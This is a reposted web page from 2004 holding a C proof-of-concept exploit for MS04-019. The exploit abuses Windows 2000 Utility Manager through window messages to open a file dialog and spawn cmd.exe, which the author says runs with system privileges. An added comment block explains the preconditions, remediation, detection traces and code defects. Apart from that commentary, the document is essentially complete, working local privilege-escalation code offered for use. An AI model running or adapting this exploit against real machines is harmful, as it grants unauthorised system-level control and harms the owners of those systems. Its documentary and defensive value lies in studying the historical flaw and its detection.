Win2k Utility Manager Privilege Elevation Exploit
来源:vfocus.net 作者:Cesar 发布时间:2004-07-16  

Windows 2000 Utility Manager Privilege Elevation Exploit (MS04-019)


//by Cesar Cerrudo sqlsec at yahoo.com
//Local elevation of privileges exploit for Windows 2K Utility Manager (second one!!!!)
//Gives you a shell with system privileges
//If you have problems try changing Sleep() values.

#include "stdio.h"
#include "windows.h"


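/*
 * Proof-of-concept for MS04-019 (the bulletin named in the page title): local
 * privilege elevation through the Windows 2000 Utility Manager.
 *
 * There is no memory corruption here.  The program drives an already-running
 * Utility Manager purely through window messages (PostMessage/SendMessage):
 * it opens the Help window, gets a file-open dialog out of it, filters that
 * dialog to cmd.exe and activates a context-menu entry on the match.  The
 * author's description is that the resulting shell runs with system
 * privileges.
 *
 * Preconditions visible in the code: Utility Manager must already be open
 * (the usage text says Win+U), the window titles "Utility manager",
 * "Windows Help" and "Open" must match (English UI), and the timing must
 * fit — every step is separated by a Sleep() that the author says may need
 * tuning.
 *
 * Defensive notes: the remediation is the MS04-019 update.  Because the
 * technique is interactive UI automation, the observable trace is a Windows
 * Help window and an "Open" file dialog belonging to utilman.exe, followed by
 * cmd.exe being started from that dialog.
 *
 * Review notes on the code as written: the FindWindow()/GetDlgItem() results
 * after the first check are used without NULL tests; NULL is passed where the
 * integer WPARAM/LPARAM parameters are expected (compiles with a warning in
 * C); and WindowFromPoint() is given fixed screen coordinates, so the program
 * assumes the context menu pops up at that position.  The only edits made to
 * the original are re-joining lines that were wrapped by the page (the usage
 * string and three trailing comments), which otherwise does not compile.
 *
 * Returns 0 in every path; argc/argv are unused.
 */
int main(int argc, char* argv[])
{
    HWND lHandle, lHandle2;
    POINT point;
    /* pattern typed into the Open dialog's file-name box; "?" lets the
       dialog's wildcard matching narrow the list to cmd.exe */
    char sText[]="%windir%\\system32\\cmd.ex?";

    (void)argc;
    (void)argv;

    // run utility manager
    // system("utilman.exe /start");
    // Sleep(500);

    // Utility Manager has to be running already; bail out with usage otherwise.
    lHandle=FindWindow(NULL, "Utility manager");
    if (!lHandle) {
        printf("\nUsage :\nPress Win Key+U to launch Utility Manager and then run UtilManExploit2.exe\n");
        return 0;
    }

    // 0x313 = right click on the app button in the taskbar or Alt+Space Bar
    PostMessage(lHandle,0x313,NULL,NULL);

    Sleep(100);

    // send WM_COMMANDHELP 0x0365; lParam must be <>NULL
    SendMessage(lHandle,0x365,NULL,0x1);
    Sleep(300);

    // press Return in the Help window that the previous message brought up
    SendMessage (FindWindow(NULL, "Windows Help"), WM_IME_KEYDOWN, VK_RETURN, 0);
    Sleep(500);


    // find open file dialog window (#32770 is the standard dialog class);
    // result is not NULL-checked, the following calls inherit that
    lHandle = FindWindow("#32770","Open");

    // get input box handle (control id 0x47C)
    lHandle2 = GetDlgItem(lHandle, 0x47C);
    Sleep(500);

    // set text to filter listview to display only cmd.exe
    SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
    Sleep(800);

    // send return
    SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

    //get navigation bar handle (control id 0x4A0)
    lHandle2 = GetDlgItem(lHandle, 0x4A0);

    //send tab
    SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
    Sleep(500);
    lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
    //get list view handle
    lHandle2 = GetDlgItem(lHandle2, 0x1);

    // type "cmd" so the list view selects the filtered entry
    SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
    SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
    SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
    Sleep(500);

    //popup context menu
    PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
    Sleep(1000);

    // get context menu handle: assumes the menu is drawn at fixed screen
    // coordinates (10,30); a different position returns some other window
    point.x =10; point.y =30;
    lHandle2=WindowFromPoint(point);

    SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
    SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
    SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

    // tear down the windows the sequence opened
    SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
    Sleep(500);
    SendMessage (FindWindow(NULL, "Windows Help"), WM_CLOSE, 0, 0); // close open error window
    SendMessage (FindWindow(NULL, "Utility manager"), WM_CLOSE, 0, 0); // close utility manager
    return 0;
}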




 